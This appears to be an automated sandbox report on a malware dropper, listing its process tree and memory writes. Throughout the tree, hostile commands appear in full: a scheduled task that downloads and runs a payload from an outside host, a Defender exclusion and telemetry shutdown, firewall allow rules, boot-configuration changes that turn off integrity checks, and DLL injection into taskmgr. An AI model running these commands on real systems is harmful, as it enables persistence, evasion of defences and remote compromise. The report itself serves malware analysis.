PID 1380 wrote to memory of 684	1380	dc6545c910d07093bae7e8b012e64dfae4cd2c91f188ab542a34928b7867340d.exe	SoCleanInst.exe
PID 1380 wrote to memory of 684	1380	dc6545c910d07093bae7e8b012e64dfae4cd2c91f188ab542a34928b7867340d.exe	SoCleanInst.exe
PID 1380 wrote to memory of 684	1380	dc6545c910d07093bae7e8b012e64dfae4cd2c91f188ab542a34928b7867340d.exe	SoCleanInst.exe
PID 1380 wrote to memory of 684	1380	dc6545c910d07093bae7e8b012e64dfae4cd2c91f188ab542a34928b7867340d.exe	SoCleanInst.exe
PID 1380 wrote to memory of 1112	1380	dc6545c910d07093bae7e8b012e64dfae4cd2c91f188ab542a34928b7867340d.exe	md9_1sjm.exe
PID 1380 wrote to memory of 1112	1380	dc6545c910d07093bae7e8b012e64dfae4cd2c91f188ab542a34928b7867340d.exe	md9_1sjm.exe
PID 1380 wrote to memory of 1112	1380	dc6545c910d07093bae7e8b012e64dfae4cd2c91f188ab542a34928b7867340d.exe	md9_1sjm.exe
PID 1380 wrote to memory of 1112	1380	dc6545c910d07093bae7e8b012e64dfae4cd2c91f188ab542a34928b7867340d.exe	md9_1sjm.exe
PID 1380 wrote to memory of 1636	1380	dc6545c910d07093bae7e8b012e64dfae4cd2c91f188ab542a34928b7867340d.exe	Folder.exe
PID 1380 wrote to memory of 1636	1380	dc6545c910d07093bae7e8b012e64dfae4cd2c91f188ab542a34928b7867340d.exe	Folder.exe
PID 1380 wrote to memory of 1636	1380	dc6545c910d07093bae7e8b012e64dfae4cd2c91f188ab542a34928b7867340d.exe	Folder.exe
PID 1380 wrote to memory of 1636	1380	dc6545c910d07093bae7e8b012e64dfae4cd2c91f188ab542a34928b7867340d.exe	Folder.exe
PID 1380 wrote to memory of 548	1380	dc6545c910d07093bae7e8b012e64dfae4cd2c91f188ab542a34928b7867340d.exe	Graphics.exe
PID 1380 wrote to memory of 548	1380	dc6545c910d07093bae7e8b012e64dfae4cd2c91f188ab542a34928b7867340d.exe	Graphics.exe
PID 1380 wrote to memory of 548	1380	dc6545c910d07093bae7e8b012e64dfae4cd2c91f188ab542a34928b7867340d.exe	Graphics.exe
PID 1380 wrote to memory of 548	1380	dc6545c910d07093bae7e8b012e64dfae4cd2c91f188ab542a34928b7867340d.exe	Graphics.exe
PID 1380 wrote to memory of 628	1380	dc6545c910d07093bae7e8b012e64dfae4cd2c91f188ab542a34928b7867340d.exe	Updbdate.exe
PID 1380 wrote to memory of 628	1380	dc6545c910d07093bae7e8b012e64dfae4cd2c91f188ab542a34928b7867340d.exe	Updbdate.exe
PID 1380 wrote to memory of 628	1380	dc6545c910d07093bae7e8b012e64dfae4cd2c91f188ab542a34928b7867340d.exe	Updbdate.exe
PID 1380 wrote to memory of 628	1380	dc6545c910d07093bae7e8b012e64dfae4cd2c91f188ab542a34928b7867340d.exe	Updbdate.exe
PID 1380 wrote to memory of 1384	1380	dc6545c910d07093bae7e8b012e64dfae4cd2c91f188ab542a34928b7867340d.exe	Install.exe
PID 1380 wrote to memory of 1384	1380	dc6545c910d07093bae7e8b012e64dfae4cd2c91f188ab542a34928b7867340d.exe	Install.exe
PID 1380 wrote to memory of 1384	1380	dc6545c910d07093bae7e8b012e64dfae4cd2c91f188ab542a34928b7867340d.exe	Install.exe
PID 1380 wrote to memory of 1384	1380	dc6545c910d07093bae7e8b012e64dfae4cd2c91f188ab542a34928b7867340d.exe	Install.exe
PID 1380 wrote to memory of 1384	1380	dc6545c910d07093bae7e8b012e64dfae4cd2c91f188ab542a34928b7867340d.exe	Install.exe
PID 1380 wrote to memory of 1384	1380	dc6545c910d07093bae7e8b012e64dfae4cd2c91f188ab542a34928b7867340d.exe	Install.exe
PID 1380 wrote to memory of 1384	1380	dc6545c910d07093bae7e8b012e64dfae4cd2c91f188ab542a34928b7867340d.exe	Install.exe
PID 1380 wrote to memory of 1808	1380	dc6545c910d07093bae7e8b012e64dfae4cd2c91f188ab542a34928b7867340d.exe	Files.exe
PID 1380 wrote to memory of 1808	1380	dc6545c910d07093bae7e8b012e64dfae4cd2c91f188ab542a34928b7867340d.exe	Files.exe
PID 1380 wrote to memory of 1808	1380	dc6545c910d07093bae7e8b012e64dfae4cd2c91f188ab542a34928b7867340d.exe	Files.exe
PID 1380 wrote to memory of 1808	1380	dc6545c910d07093bae7e8b012e64dfae4cd2c91f188ab542a34928b7867340d.exe	Files.exe
PID 1380 wrote to memory of 1572	1380	dc6545c910d07093bae7e8b012e64dfae4cd2c91f188ab542a34928b7867340d.exe	pub2.exe
PID 1380 wrote to memory of 1572	1380	dc6545c910d07093bae7e8b012e64dfae4cd2c91f188ab542a34928b7867340d.exe	pub2.exe
PID 1380 wrote to memory of 1572	1380	dc6545c910d07093bae7e8b012e64dfae4cd2c91f188ab542a34928b7867340d.exe	pub2.exe
PID 1380 wrote to memory of 1572	1380	dc6545c910d07093bae7e8b012e64dfae4cd2c91f188ab542a34928b7867340d.exe	pub2.exe
PID 1380 wrote to memory of 1388	1380	dc6545c910d07093bae7e8b012e64dfae4cd2c91f188ab542a34928b7867340d.exe	File.exe
PID 1380 wrote to memory of 1388	1380	dc6545c910d07093bae7e8b012e64dfae4cd2c91f188ab542a34928b7867340d.exe	File.exe
PID 1380 wrote to memory of 1388	1380	dc6545c910d07093bae7e8b012e64dfae4cd2c91f188ab542a34928b7867340d.exe	File.exe
PID 1380 wrote to memory of 1388	1380	dc6545c910d07093bae7e8b012e64dfae4cd2c91f188ab542a34928b7867340d.exe	File.exe
PID 1808 wrote to memory of 1844	1808	Files.exe	jfiag3g_gg.exe
PID 1808 wrote to memory of 1844	1808	Files.exe	jfiag3g_gg.exe
PID 1808 wrote to memory of 1844	1808	Files.exe	jfiag3g_gg.exe
PID 1808 wrote to memory of 1844	1808	Files.exe	jfiag3g_gg.exe
PID 1384 wrote to memory of 1520	1384	Install.exe	cmd.exe
PID 1384 wrote to memory of 1520	1384	Install.exe	cmd.exe
PID 1384 wrote to memory of 1520	1384	Install.exe	cmd.exe
PID 1384 wrote to memory of 1520	1384	Install.exe	cmd.exe
PID 1520 wrote to memory of 1160	1520	cmd.exe	taskkill.exe
PID 1520 wrote to memory of 1160	1520	cmd.exe	taskkill.exe
PID 1520 wrote to memory of 1160	1520	cmd.exe	taskkill.exe
PID 1520 wrote to memory of 1160	1520	cmd.exe	taskkill.exe
PID 660 wrote to memory of 1108	660	Graphics.exe	cmd.exe
PID 660 wrote to memory of 1108	660	Graphics.exe	cmd.exe
PID 660 wrote to memory of 1108	660	Graphics.exe	cmd.exe
PID 660 wrote to memory of 1108	660	Graphics.exe	cmd.exe
PID 1108 wrote to memory of 684	1108	cmd.exe	netsh.exe
PID 1108 wrote to memory of 684	1108	cmd.exe	netsh.exe
PID 1108 wrote to memory of 684	1108	cmd.exe	netsh.exe
PID 1808 wrote to memory of 1536	1808	Files.exe	jfiag3g_gg.exe
PID 1808 wrote to memory of 1536	1808	Files.exe	jfiag3g_gg.exe
PID 1808 wrote to memory of 1536	1808	Files.exe	jfiag3g_gg.exe
PID 1808 wrote to memory of 1536	1808	Files.exe	jfiag3g_gg.exe
PID 660 wrote to memory of 1852	660	Graphics.exe	csrss.exe
PID 660 wrote to memory of 1852	660	Graphics.exe	csrss.exe

C:\Users\Admin\AppData\Local\Temp\dc6545c910d07093bae7e8b012e64dfae4cd2c91f188ab542a34928b7867340d.exe
"C:\Users\Admin\AppData\Local\Temp\dc6545c910d07093bae7e8b012e64dfae4cd2c91f188ab542a34928b7867340d.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1380

C:\Users\Admin\AppData\Local\Temp\SoCleanInst.exe
"C:\Users\Admin\AppData\Local\Temp\SoCleanInst.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:684

C:\Users\Admin\AppData\Local\Temp\Folder.exe
"C:\Users\Admin\AppData\Local\Temp\Folder.exe"
2⤵
- Executes dropped EXE
PID:1636

C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe
"C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1112

C:\Users\Admin\AppData\Local\Temp\Graphics.exe
"C:\Users\Admin\AppData\Local\Temp\Graphics.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:548

C:\Users\Admin\AppData\Local\Temp\Graphics.exe
"C:\Users\Admin\AppData\Local\Temp\Graphics.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Windows security modification
- Adds Run key to start application
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:660

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
4⤵
- Suspicious use of WriteProcessMemory
PID:1108

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
5⤵
- Modifies data under HKEY_USERS
PID:684

C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe /202-202
4⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:1852

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
5⤵
- Creates scheduled task(s)
PID:1500

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://spolaect.info/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
5⤵
- Creates scheduled task(s)
PID:1820

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
PID:1836

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
6⤵
- Modifies boot configuration data using bcdedit
PID:928

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
6⤵
- Modifies boot configuration data using bcdedit
PID:1180

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
6⤵
- Modifies boot configuration data using bcdedit
PID:1760

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
6⤵
- Modifies boot configuration data using bcdedit
PID:988

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
6⤵
- Modifies boot configuration data using bcdedit
PID:836

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
6⤵
- Modifies boot configuration data using bcdedit
PID:592

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
6⤵
- Modifies boot configuration data using bcdedit
PID:1560

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
6⤵
- Modifies boot configuration data using bcdedit
PID:1496

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
6⤵
- Modifies boot configuration data using bcdedit
PID:1840

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
6⤵
- Modifies boot configuration data using bcdedit
PID:908

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
6⤵
- Modifies boot configuration data using bcdedit
PID:1372

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -timeout 0
6⤵
- Modifies boot configuration data using bcdedit
PID:936

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
6⤵
- Modifies boot configuration data using bcdedit
PID:1996

C:\Windows\system32\bcdedit.exe
C:\Windows\Sysnative\bcdedit.exe /v
5⤵
- Modifies boot configuration data using bcdedit
PID:1672

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
5⤵
- Executes dropped EXE
PID:1192

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
5⤵
- Executes dropped EXE
PID:548

C:\Users\Admin\AppData\Local\Temp\Install.exe
"C:\Users\Admin\AppData\Local\Temp\Install.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1384

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:1520

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1160

C:\Users\Admin\AppData\Local\Temp\Updbdate.exe
"C:\Users\Admin\AppData\Local\Temp\Updbdate.exe"
2⤵
- Executes dropped EXE
PID:628

C:\Users\Admin\AppData\Local\Temp\File.exe
"C:\Users\Admin\AppData\Local\Temp\File.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
PID:1388

C:\Users\Admin\Pictures\Adobe Films\MfW_SbWIf1btGLLLujoDdEow.exe
"C:\Users\Admin\Pictures\Adobe Films\MfW_SbWIf1btGLLLujoDdEow.exe"
3⤵
- Executes dropped EXE
PID:1180

C:\Users\Admin\Pictures\Adobe Films\AJ6TC4hzLC0gagrPExdqgTJ2.exe
"C:\Users\Admin\Pictures\Adobe Films\AJ6TC4hzLC0gagrPExdqgTJ2.exe"
3⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Modifies system certificate store
PID:2088

C:\Users\Admin\Documents\pQdnUIuF5LpqgCslCHf_7Pwz.exe
"C:\Users\Admin\Documents\pQdnUIuF5LpqgCslCHf_7Pwz.exe"
4⤵
- Executes dropped EXE
PID:2780

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
4⤵
- Creates scheduled task(s)
PID:2852

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
4⤵
- Creates scheduled task(s)
PID:1844

C:\Users\Admin\Pictures\Adobe Films\WTUPMwbaGVnoXxSQZt_QXLee.exe
"C:\Users\Admin\Pictures\Adobe Films\WTUPMwbaGVnoXxSQZt_QXLee.exe"
3⤵
- Executes dropped EXE
PID:2112

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "WTUPMwbaGVnoXxSQZt_QXLee.exe" /f & erase "C:\Users\Admin\Pictures\Adobe Films\WTUPMwbaGVnoXxSQZt_QXLee.exe" & exit
4⤵
PID:2816

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "WTUPMwbaGVnoXxSQZt_QXLee.exe" /f
5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3056

C:\Users\Admin\Pictures\Adobe Films\UsoHnPiea5Fp1EKiPPrh0Aj5.exe
"C:\Users\Admin\Pictures\Adobe Films\UsoHnPiea5Fp1EKiPPrh0Aj5.exe"
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2120

C:\Users\Admin\Pictures\Adobe Films\aLUQtm1RwFToh62fOSTQ_2KO.exe
"C:\Users\Admin\Pictures\Adobe Films\aLUQtm1RwFToh62fOSTQ_2KO.exe"
3⤵
- Executes dropped EXE
PID:2128

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /C choice /C Y /N /D Y /T 0 &Del C:\Users\Admin\Pictures\Adobe Films\aLUQtm1RwFToh62fOSTQ_2KO.exe
4⤵
PID:2504

C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 0
5⤵
PID:2528

C:\Users\Admin\Pictures\Adobe Films\zcjYLxa5YUegqMghLuXmTefO.exe
"C:\Users\Admin\Pictures\Adobe Films\zcjYLxa5YUegqMghLuXmTefO.exe"
3⤵
- Executes dropped EXE
PID:2220

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c cmd < Affaticato.gif
4⤵
PID:2452

C:\Windows\SysWOW64\cmd.exe
cmd
5⤵
PID:2584

C:\Windows\SysWOW64\find.exe
find /I /N "bullguardcore.exe"
6⤵
PID:2624

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "imagename eq BullGuardCore.exe"
6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2616

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "imagename eq PSUAService.exe"
6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2096

C:\Windows\SysWOW64\find.exe
find /I /N "psuaservice.exe"
6⤵
PID:588

C:\Windows\SysWOW64\findstr.exe
findstr /V /R "^uEDzPzHFCdzewXWMRhXuwzGNjMXXrsYuMnTuDfFnaaWMxrxJAnNdPOrNYPircJBlshdCrQoBHnNIvTzoshbFDH$" Koubbeh.gif
6⤵
PID:1844

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Accostarmi.exe.pif
Accostarmi.exe.pif N
6⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2768

C:\Windows\SysWOW64\waitfor.exe
waitfor /t 5 jFjyKdbHiNcpqGHLaDXhhIXfDT
6⤵
PID:2808

C:\Users\Admin\Pictures\Adobe Films\e4ErAuveBa5IH5z1QJUSx3vk.exe
"C:\Users\Admin\Pictures\Adobe Films\e4ErAuveBa5IH5z1QJUSx3vk.exe"
3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
PID:2212

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2524

C:\Users\Admin\Pictures\Adobe Films\j75BD_nP3E3g1bzeINMB3szz.exe
"C:\Users\Admin\Pictures\Adobe Films\j75BD_nP3E3g1bzeINMB3szz.exe"
3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
PID:2200

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2656

C:\Users\Admin\Pictures\Adobe Films\P5uQo79iFYr86_unoYTsXVnM.exe
"C:\Users\Admin\Pictures\Adobe Films\P5uQo79iFYr86_unoYTsXVnM.exe"
3⤵
- Executes dropped EXE
- Checks processor information in registry
PID:2168

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im P5uQo79iFYr86_unoYTsXVnM.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\P5uQo79iFYr86_unoYTsXVnM.exe" & del C:\ProgramData\*.dll & exit
4⤵
PID:2464

C:\Windows\SysWOW64\taskkill.exe
taskkill /im P5uQo79iFYr86_unoYTsXVnM.exe /f
5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:480

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
5⤵
- Delays execution with timeout.exe
PID:776

C:\Users\Admin\Pictures\Adobe Films\8m1JW3DCsjF1fuhIhZTvnrq7.exe
"C:\Users\Admin\Pictures\Adobe Films\8m1JW3DCsjF1fuhIhZTvnrq7.exe"
3⤵
- Executes dropped EXE
PID:2160

C:\Users\Admin\Pictures\Adobe Films\7Ys2lxCQxGgDmRt0QuPQ2JFp.exe
"C:\Users\Admin\Pictures\Adobe Films\7Ys2lxCQxGgDmRt0QuPQ2JFp.exe"
3⤵
- Executes dropped EXE
PID:2288

C:\Users\Admin\AppData\Local\Temp\7zS2D28.tmp\Install.exe
.\Install.exe
4⤵
- Executes dropped EXE
PID:1168

C:\Users\Admin\AppData\Local\Temp\7zS450C.tmp\Install.exe
.\Install.exe /S /site_id "525403"
5⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Drops file in System32 directory
- Enumerates system info in registry
PID:2064

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
6⤵
PID:2160

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
7⤵
PID:2792

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
8⤵
PID:2496

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
8⤵
PID:2516

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
6⤵
PID:2436

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
7⤵
PID:2108

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
8⤵
PID:2276

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
8⤵
PID:2580

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gDOkXDgpX" /SC once /ST 00:55:09 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
6⤵
- Creates scheduled task(s)
PID:2824

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gDOkXDgpX"
6⤵
PID:1612

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gDOkXDgpX"
6⤵
PID:2280

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "booXbIzkEgfNdKvxAC" /SC once /ST 01:23:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\GHoNhggtAPCruoj\ggkbWWV.exe\" j6 /site_id 525403 /S" /V1 /F
6⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2652

C:\Users\Admin\Pictures\Adobe Films\Kw6Nnl6pX4xf0ysVuA7zk9nk.exe
"C:\Users\Admin\Pictures\Adobe Films\Kw6Nnl6pX4xf0ysVuA7zk9nk.exe"
3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
PID:2304

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2608

C:\Users\Admin\Pictures\Adobe Films\EP0WuBrtGWGK5fmYQHX7kBoA.exe
"C:\Users\Admin\Pictures\Adobe Films\EP0WuBrtGWGK5fmYQHX7kBoA.exe"
3⤵
- Executes dropped EXE
PID:2296

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\ohikezke\
4⤵
PID:2788

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\gqdlvptu.exe" C:\Windows\SysWOW64\ohikezke\
4⤵
PID:2884

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" create ohikezke binPath= "C:\Windows\SysWOW64\ohikezke\gqdlvptu.exe /d\"C:\Users\Admin\Pictures\Adobe Films\EP0WuBrtGWGK5fmYQHX7kBoA.exe\"" type= own start= auto DisplayName= "wifi support"
4⤵
PID:2664

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" description ohikezke "wifi internet conection"
4⤵
PID:776

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" start ohikezke
4⤵
PID:3020

C:\Windows\SysWOW64\netsh.exe
"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
4⤵
PID:3044

C:\Users\Admin\Pictures\Adobe Films\46fQNaBNg6BnGDUSYxz4Mr5h.exe
"C:\Users\Admin\Pictures\Adobe Films\46fQNaBNg6BnGDUSYxz4Mr5h.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2364

C:\Users\Admin\Pictures\Adobe Films\46fQNaBNg6BnGDUSYxz4Mr5h.exe
"C:\Users\Admin\Pictures\Adobe Films\46fQNaBNg6BnGDUSYxz4Mr5h.exe"
4⤵
- Executes dropped EXE
PID:2432

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2432 -s 192
5⤵
- Program crash
PID:2640

C:\Users\Admin\Pictures\Adobe Films\IaQybWfoGh37ET5uWcailg0q.exe
"C:\Users\Admin\Pictures\Adobe Films\IaQybWfoGh37ET5uWcailg0q.exe"
3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:2356

C:\Users\Admin\Pictures\Adobe Films\qT3qkutpE2O_QhpJnMUTPThy.exe
"C:\Users\Admin\Pictures\Adobe Films\qT3qkutpE2O_QhpJnMUTPThy.exe"
3⤵
- Executes dropped EXE
PID:2348

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2348 -s 412
4⤵
- Program crash
PID:2568

C:\Users\Admin\Pictures\Adobe Films\Qy_EMm7G77Re40IunmD_T4Wk.exe
"C:\Users\Admin\Pictures\Adobe Films\Qy_EMm7G77Re40IunmD_T4Wk.exe"
3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
PID:2436

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2720

C:\Users\Admin\Pictures\Adobe Films\Aodn_pUpVuL3dE2BvSg53rhb.exe
"C:\Users\Admin\Pictures\Adobe Films\Aodn_pUpVuL3dE2BvSg53rhb.exe"
3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
PID:2484

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
4⤵
